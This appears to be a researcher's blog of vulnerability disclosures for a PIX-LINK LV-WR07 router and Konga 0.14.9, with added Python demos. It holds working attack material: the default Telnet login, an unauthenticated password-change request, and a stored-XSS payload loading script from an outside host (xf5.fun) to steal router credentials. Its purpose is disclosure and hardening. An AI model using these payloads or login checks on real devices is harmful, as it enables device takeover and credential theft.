Sunday, April 28, 2024

Weak Remote Telnet Access at PIX-LINK LV-WR07 ("CVE requested")


Report Vulnerability

Product: PIX-LINK
Model: LV-WR07
Vulnerability: Weak Remote Telnet Access
Impact: This allows an attacker to gain root access to the device over the local network.
Author: Red Team ~ Fabrício Oliveira (xf5), Miguel Alves (@0xmupa), Sérgio Charruadas;

PoC

The router exposes a Telnet service protected only by weak default credentials. Logging in with the username and password pair "admin:admin" gives remote administrator (root) access to the router's shell.


The screenshots show example commands that take the router down by writing to its SPI flash memory from that shell.
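A check for the default-credential Telnet login described above, as an added example that is not part of the original report. It speaks enough raw Telnet to refuse option negotiation (IAC DO/WILL), sends the credentials, and decides on the resulting prompt. Because it has to run offline, it also carries a constructed stand-in for the router's Telnet daemon that accepts only admin/admin; the prompt strings ("login:", "Password:", "# ") are assumptions based on a typical BusyBox login, not captured from the LV-WR07.

```python
import socket
import socketserver
import threading

# Telnet protocol bytes (RFC 854/855): IAC introduces option negotiation.
IAC, DONT, DO, WONT, WILL = 255, 254, 253, 252, 251


def strip_iac(data: bytes) -> tuple:
    """Split a Telnet byte stream into (plain_text, reply).

    Every option the peer offers (WILL) or requests (DO) is refused with
    DONT/WONT so the session stays in plain NVT mode; IAC IAC is a literal 0xFF.
    Sequences split across recv() boundaries are not handled (fine for a check).
    """
    text, reply = bytearray(), bytearray()
    i = 0
    while i < len(data):
        b = data[i]
        if b != IAC:
            text.append(b)
            i += 1
        elif i + 1 < len(data) and data[i + 1] == IAC:
            text.append(IAC)
            i += 2
        elif i + 2 < len(data) and data[i + 1] in (DO, DONT, WILL, WONT):
            cmd, opt = data[i + 1], data[i + 2]
            if cmd == DO:
                reply += bytes([IAC, WONT, opt])
            elif cmd == WILL:
                reply += bytes([IAC, DONT, opt])
            i += 3
        else:
            i += 2  # two-byte command (NOP, GA, ...) or a truncated sequence
    return bytes(text), bytes(reply)


def read_until(sock: socket.socket, markers, timeout: float) -> bytes:
    """Read until one of the (lowercase) markers appears, the peer closes, or timeout."""
    sock.settimeout(timeout)
    buf = b""
    while not any(m in buf.lower() for m in markers):
        try:
            chunk = sock.recv(1024)
        except socket.timeout:
            break
        if not chunk:
            break
        text, reply = strip_iac(chunk)
        if reply:
            sock.sendall(reply)
        buf += text
    return buf


def telnet_default_login(host: str, port: int = 23, user: bytes = b"admin",
                         password: bytes = b"admin", timeout: float = 3.0) -> bool:
    """Return True if user:password logs in and lands on a shell prompt."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        read_until(s, [b"login:", b"username:"], timeout)
        s.sendall(user + b"\r\n")
        read_until(s, [b"password:"], timeout)
        s.sendall(password + b"\r\n")
        banner = read_until(s, [b"# ", b"$ ", b"incorrect", b"failed", b"login:"], timeout)
    low = banner.lower()
    if b"incorrect" in low or b"failed" in low:
        return False
    # A BusyBox root shell ends its prompt with '#', an unprivileged one with '$'.
    last = banner.strip().splitlines()[-1] if banner.strip() else b""
    return last.rstrip().endswith((b"#", b"$"))


class FakeRouterHandler(socketserver.BaseRequestHandler):
    """Constructed stand-in for the router's Telnet daemon: accepts only admin/admin."""

    def _readline(self) -> bytes:
        buf = b""
        while not buf.endswith(b"\n"):
            c = self.request.recv(1)
            if not c:
                break
            buf += c
        return strip_iac(buf)[0].strip()

    def handle(self):
        # Offer the ECHO option as a real daemon would; the client refuses it.
        self.request.sendall(bytes([IAC, WILL, 1]) + b"\r\nlogin: ")
        user = self._readline()
        self.request.sendall(b"Password: ")
        pw = self._readline()
        if user == b"admin" and pw == b"admin":
            self.request.sendall(b"\r\nBusyBox built-in shell (constructed banner)\r\n# ")
        else:
            self.request.sendall(b"\r\nLogin incorrect\r\nlogin: ")


def start_fake_router() -> socketserver.TCPServer:
    """Start the stand-in on a free loopback port (read it from server_address)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeRouterHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    router = start_fake_router()
    print("admin/admin accepted:", telnet_default_login("127.0.0.1", router.server_address[1]))
    router.shutdown()
```

Against a real device, call telnet_default_login with the router's address and port 23; a True result is the finding. The prompt-based decision is deliberately conservative: anything that is not clearly a shell prompt counts as a failed login.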





Friday, April 26, 2024

Account Takeover Admin Account at PIX-LINK LV-WR07 ("CVE requested")

Report Vulnerability

Product: PIX-LINK
Model: LV-WR07
Vulnerability: Account Takeover - Admin Account
Impact: Account Takeover in the Admin Account.
Author: Red Team ~ Fabrício Oliveira (xf5), Miguel Alves (@0xmupa), Sérgio Charruadas;

PoC

The router has a single account, 'admin', which makes an account-takeover attack straightforward. The vulnerability can be seen by removing the "Cookie: Authorization=Basic ..." header from the password-change request: with it removed, the request is still accepted (the back-end does not validate the authorization of the request), which allows the administrator password to be changed.


Through this, we can change the admin password without being authenticated in a session. The new password is set through a GET request in the "SET1" variable, resulting in the account takeover.

After this, an exploit was crafted to change the administrator's password.


In the exploit above, note that no 'Cookie: Authorization' header is sent, and the 'SET1' variable receives user input (the new password value).

The picture below shows the exploit's usage. The user only needs to enter the router IP/DNS name and the new password.


As seen below, the exploit was executed, changing the password to "cwo123".
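The missing authorization check, shown as an added example that is not the report's exploit or the vendor's firmware code. It runs a constructed stand-in for the router's password page in two modes: the vulnerable behaviour described above (any GET carrying SET1 changes the password, cookie or not) and the hardened one (the request is refused with 401 unless the Authorization cookie carries the current admin credentials). The endpoint path "/pass.htm" is an assumption taken from the page name mentioned in the XSS post; the cookie format matches the captured request there.

```python
import base64
import http.server
import threading
import urllib.parse
import urllib.request
from urllib.error import HTTPError

PASS_PATH = "/pass.htm"   # assumed path of the password page; not confirmed by the report


class RouterState:
    """Constructed in-memory stand-in for the router's stored admin password."""
    def __init__(self):
        self.admin_password = "admin"


def make_handler(state: RouterState, enforce_auth: bool):
    class PassHandler(http.server.BaseHTTPRequestHandler):
        def log_message(self, *args):   # keep the example quiet
            pass

        def _authorized(self) -> bool:
            # The LV-WR07 carries HTTP Basic credentials in a cookie named
            # "Authorization" (see the captured request in the XSS post).
            for part in self.headers.get("Cookie", "").split(";"):
                name, _, value = part.strip().partition("=")
                if name == "Authorization" and value.startswith("Basic "):
                    try:
                        creds = base64.b64decode(value[6:], validate=True).decode()
                    except ValueError:
                        return False
                    return creds == f"admin:{state.admin_password}"
            return False

        def do_GET(self):
            url = urllib.parse.urlparse(self.path)
            params = urllib.parse.parse_qs(url.query)
            if url.path != PASS_PATH or "SET1" not in params:
                self.send_error(404)
                return
            if enforce_auth and not self._authorized():
                self.send_error(401)   # hardened: refuse the unauthenticated change
                return
            # Vulnerable mode reaches this line with no cookie at all.
            state.admin_password = params["SET1"][0]
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"OK")
    return PassHandler


def basic_cookie(user: str, password: str) -> str:
    """Build the router-style cookie: Authorization=Basic base64(user:password)."""
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Authorization=Basic {token}"


def change_password(host: str, port: int, new_password: str, cookie=None) -> int:
    """Issue the password-change GET; return the HTTP status (200 = password changed)."""
    url = f"http://{host}:{port}{PASS_PATH}?" + urllib.parse.urlencode({"SET1": new_password})
    req = urllib.request.Request(url)
    if cookie:
        req.add_header("Cookie", cookie)
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # ignore env proxies
    try:
        with opener.open(req, timeout=3) as resp:
            return resp.status
    except HTTPError as err:
        return err.code


def start_router(enforce_auth: bool):
    """Start the stand-in on a free loopback port; returns (server, state)."""
    state = RouterState()
    srv = http.server.ThreadingHTTPServer(("127.0.0.1", 0), make_handler(state, enforce_auth))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, state


if __name__ == "__main__":
    for enforce in (False, True):
        srv, state = start_router(enforce)
        code = change_password("127.0.0.1", srv.server_address[1], "cwo123")
        print(f"enforce_auth={enforce}: status {code}, password now {state.admin_password!r}")
        srv.shutdown()
```

The point of the hardened handler is that the credential check happens on the state-changing request itself, not only on the page that renders the form; a device that checks only the latter behaves exactly like the vulnerable mode.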


The video below shows the full PoC.






Tuesday, November 16, 2021

KONGA 0.14.9 - Privilege Escalation (Exploit) ("Won CVE-2021-42192!")

Report Vulnerability

Product: KONGA 
Model:  0.14.9 
Vulnerability: Privilege Escalation
Impact: Full admin access (vertical privilege escalation)

Authentication: required 

Exploit Author: Fabricio Salomao (@_SOl0m0n) / Paulo Trindade (@paulotrindadec)


PoC


Below, a normal user called "usernormal" was created, without privileges.







Through the request below, the "admin" parameter was changed from "FALSE" to "TRUE".



An exploit was then written for this: https://www.exploit-db.com/exploits/50521
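The underlying bug pattern, mass assignment of an "admin" flag through a profile-update request, as an added example that is not Konga's code and not the published exploit. It models the vulnerable update beside the hardened one over a constructed in-memory user table; the field names and the shape of the update are illustrative assumptions, not Konga's schema or API.

```python
import copy
import json

# Constructed in-memory user table; field names are illustrative, not Konga's schema.
USERS = {
    1: {"id": 1, "username": "admin", "email": "admin@example.test", "admin": True},
    2: {"id": 2, "username": "usernormal", "email": "normal@example.test", "admin": False},
}

PROFILE_FIELDS = {"username", "email", "firstName", "lastName"}   # editable by the user
PRIVILEGED_FIELDS = {"id", "admin"}                                # never via this endpoint


class Forbidden(Exception):
    pass


def fresh_store() -> dict:
    return copy.deepcopy(USERS)


def update_profile_vulnerable(users: dict, caller_id: int, target_id: int, body: str) -> dict:
    """Mass assignment: the whole JSON body is written onto the record.

    A low-privilege caller who adds "admin": true to the body promotes themself,
    which is the flag flip the request in the post performs.
    """
    user = users[target_id]
    user.update(json.loads(body))
    return user


def update_profile_hardened(users: dict, caller_id: int, target_id: int, body: str) -> dict:
    """Same endpoint with the two checks that were missing.

    1. Object-level authorisation: only the owner or an admin may edit the record.
    2. Field allowlist: privileged fields are rejected outright rather than silently
       dropped, so an attempt is visible in the logs instead of failing quietly.
    Role changes belong to a separate admin-only operation, not the profile update.
    """
    caller = users[caller_id]
    if caller_id != target_id and not caller["admin"]:
        raise Forbidden("cannot edit another user's profile")
    payload = json.loads(body)
    bad = set(payload) & PRIVILEGED_FIELDS
    if bad:
        raise Forbidden(f"privileged fields not accepted here: {sorted(bad)}")
    users[target_id].update({k: v for k, v in payload.items() if k in PROFILE_FIELDS})
    return users[target_id]


def try_update(fn, users: dict, caller_id: int, target_id: int, body: str) -> tuple:
    """Run an update function; return ('ok', record) or ('forbidden', message)."""
    try:
        return "ok", fn(users, caller_id, target_id, body)
    except Forbidden as err:
        return "forbidden", str(err)


if __name__ == "__main__":
    attack = '{"email": "normal@example.test", "admin": true}'
    print("vulnerable:", try_update(update_profile_vulnerable, fresh_store(), 2, 2, attack))
    print("hardened:  ", try_update(update_profile_hardened, fresh_store(), 2, 2, attack))
```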



After running the exploit, the privilege escalation succeeded.

Result:







Tuesday, July 21, 2020

Stored Cross-site scripting (XSS) at PIX-LINK LV-WR07 ("Won CVE-2020-24104!")

Report Vulnerability

Product: PIX-LINK
Model: LV-WR07
Vulnerability: Stored Cross-site scripting (XSS)
Impact: Router credential theft and malicious JavaScript injection


PoC

The "BASIC SETTINGS" page of the router panel has an ESSID input field. JavaScript can be injected through this field.



The request is below:
GET /wireless.htm?CMD=WL_BASIC&GO=wireless.htm&SET0=82247936=1&SET1=70451456=9&SET2=71041536=PAYLOAD_XSS&SET3=70713600=3&SET4=67567872=0&SET5=76743168=0;0;0;0&SET6=70648064=1&SET7=71762176=1&SET8=71368960=1&SET9=82051328=1&SET10=81002752=0&SET11=76939776=OPEN;OPEN;OPEN;OPEN&SET12=71893504=NONE;NONE;NONE;NONE&SET13=77201920=12345678&SET14=70910464=1;1;1;1&SET15=76546304=1&SET16=76611840=1&SET17=75956480=1&SET18=76677632=scaptest&SET19=70582784=0;0;0;0&SET20=68288768=100&rd=0.09415532139725702&_=1595340582749 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.1/wireless.htm
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: Authorization=Basic YWRtaW46SGFja0FsbA==
Inject a simple XSS payload: <script>alert('xss')</script>


With the information below, the credentials in "pass.htm" and "index.htm" could be stolen.




Now we set up a server with a script that steals sensitive data from the router:
Http://xf5.fun/a.php

I created a simple script, but you can create a more complex one with the information above.


Note: the SSID field stores at most 32 characters, so a short payload is needed.

<script src=//xf5.fun></script>




Result:





You can also use a malicious redirect, or steal the cookie carrying the Base64-encoded credentials; use your imagination.
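The two practical constraints of this finding, the 32-character SSID budget and the Base64 credentials sitting in the Authorization cookie, as an added example that is not part of the original report. It builds the short script-include payload and verifies it fits, shows the unescaped rendering beside the output-encoding fix, and decodes a router-style cookie of the form captured in the request above (the decoded value is whatever was in that cookie at capture time; the collector host is only used as a string).

```python
import base64
import html

SSID_MAX_LEN = 32   # the router's SSID field limit noted in the post


def build_ssid_payload(host: str) -> str:
    """Shortest script-include payload for the SSID field.

    A scheme-relative src (//host) saves the 'http:' bytes; the check refuses
    anything that would be truncated by the 32-character field.
    """
    payload = f"<script src=//{host}></script>"
    if len(payload.encode()) > SSID_MAX_LEN:
        raise ValueError(f"payload is {len(payload.encode())} bytes; limit is {SSID_MAX_LEN}")
    return payload


def render_ssid_vulnerable(ssid: str) -> str:
    """How the router's pages effectively render the stored ESSID: unescaped."""
    return f"<td>{ssid}</td>"


def render_ssid_fixed(ssid: str) -> str:
    """The fix: HTML-encode the stored value at output time (length and charset
    limits on input are a second layer, not a substitute)."""
    return f"<td>{html.escape(ssid, quote=True)}</td>"


def decode_basic_cookie(cookie_header: str) -> tuple:
    """Recover (user, password) from an 'Authorization=Basic <b64>' cookie, which is
    what an injected script would exfiltrate after reading document.cookie."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "Authorization" and value.startswith("Basic "):
            user, _, password = base64.b64decode(value[6:]).decode().partition(":")
            return user, password
    raise ValueError("no Basic Authorization cookie present")


if __name__ == "__main__":
    p = build_ssid_payload("xf5.fun")
    print(len(p), "bytes:", p)
    print("vulnerable:", render_ssid_vulnerable(p))
    print("fixed:     ", render_ssid_fixed(p))
    print("cookie ->", decode_basic_cookie("Authorization=Basic YWRtaW46SGFja0FsbA=="))
```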